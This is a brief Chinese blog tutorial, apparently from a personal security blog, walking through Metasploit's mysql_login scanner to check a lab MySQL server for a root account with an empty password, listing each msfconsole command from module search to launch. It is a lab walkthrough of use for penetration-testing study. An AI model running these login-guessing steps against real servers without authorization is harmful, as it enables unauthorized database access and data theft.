metasploit扫描mysql空密码

靶机IP 192.168.255.100

攻击机IP 192.168.255.200

流程开始

查找mysql登录模块

msf5 > search mysql_login

 

 加载这个模块

msf5 > use auxiliary/scanner/mysql/mysql_login
msf5 auxiliary(scanner/mysql/mysql_login) >

查看需要设置的参数

msf5 auxiliary(scanner/mysql/mysql_login) > show options

 

 

 设置目标主机

msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.255.100
RHOSTS => 192.168.255.100

设置mysql账号参数

 

msf5 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root

设置允许测试所有用户空密码

msf5 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true

开始攻击

msf5 auxiliary(scanner/mysql/mysql_login) > exploit

 

posted @ 2020-10-08 07:58  MineLSG  阅读(245)  评论(0编辑  收藏  举报